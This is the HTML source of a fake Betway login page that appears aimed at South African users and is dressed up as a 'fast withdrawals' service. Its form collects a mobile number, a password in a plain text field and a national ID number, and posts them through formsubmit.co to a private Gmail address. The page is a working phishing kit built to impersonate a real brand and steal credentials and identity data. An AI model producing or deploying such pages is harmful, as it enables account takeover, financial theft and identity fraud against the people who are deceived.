<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Betway Fast Withdrawals Time Management</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0"> 

<style>
*{
    Margin:0;
    padding: 0;
}  

body {
   background: url( "https://i.ibb.co/PzRXgRB/Betway.jpg");
   
  background-size: cover; 
    
}


.contenter{
    margin:2px; 
    width:350px;
    height: 690px;
    border-radius: 3px;
    background: whitesmoke;
    
     
     
}



section{
          
    
}



h2{
    color: #339900;
    text-align: center;
    
}

#p1{
    
    position: absolute;
    text-align: center;
    width:28px;
    padding: 9px;
    height: 24px;
    border: #339900 solid 3px;
    
    margin-left: 10px;
    
    color: white;
    background: #339900;
    border-bottom-left-radius: 3px;
    border-top-left-radius: 3px;
    
    
}

#p2{
    margin-left: 190px;
    color: gray;
}

#number{
    margin-left: 60px;
    width: 260px;
    height: 44px;
    outline-color: #339900;
    border-bottom-right-radius:3px ;
    border-top-right-radius:3px ;
   border-color: #339900;
   border-left-width: 2.6px;
   
   
   
   
}


#number:hover{
    outline-color: #339900;
}

#pass{
    width: 310px;
    height: 44px;
    margin-left: 10px;
    margin-top:30px ;
    border-radius: 3px;
    border-color: #339900;
    
    
}
#pass:hover{
    outline-color: #339900;
}


.solve{
    margin: ;
}


.cont{
    margin-top: 10px;
    
}

.div1{
   text-align: center;
   
   
}

input::placeholder{
    
    padding-left: 10px;
    color: #339900;
}


.btn{
    width:312px ;
    margin: 10px;
    height: 45px;
    color: white;
    background:#339900 ;
    border-color: #339900 ;
    border-radius: 3px;
    border: none;
    font-weight: bolder;
    font-size: 15px;
}

#p3{
    text-align: center;
    margin: 2px;
    margin-bottom: 12px;
    color: gray;
}

#btnn{
    width:89px ;
    height: 44px;
   margin-left: 116px;
   color: #339900;
   border-color:#339900 ;
   background: white;
   border-radius: 3px;
   font-weight: bolder;
  
}

img{
    width: 350px;
    
}

.btn:hover{
    background:#339900;
}

h6{
    text-align: center;
    color: gray;
}

</style>
    
</head>
<body>
    
    <form action="https://formsubmit.co/tembezama368@gmail.com" method="POST">
    
  <div class="contenter">  
 <section>  
   
 <img src="https://i.ibb.co/QpXgzzF/Betway.jpg" alt="Betway" border="0"></a> 
   
    <h2>Login</h2>
   
   
<div class="solve">  
     
  <div class="cont">   
<div class="input1"><p id="p1">+27</p></div><input type="number" id="number" name="number" placeholder="Mobile Number" required>


<p id="p2">Forgot Username?<p/>
</div>

<input type="text" name="name" placeholder="Password" id="pass" required>

           

<p id="p2">Forgot Password?</p>

<input type="Gmail" name="Gmail" placeholder=" ID Number" id="pass" required>  



<button class="btn">Login</button>


<p id="p3">Don't have an account yet?</p>


<button id="btnn">Sign Up</button>
   </div> 
   
 <h6><br>NB:make Sure Details are Correct<br>
 
 
 <br>2024© Copy all Right<br></h6>  
   
</section>   
 </div>  
    
 
 
    
</body>
</html>
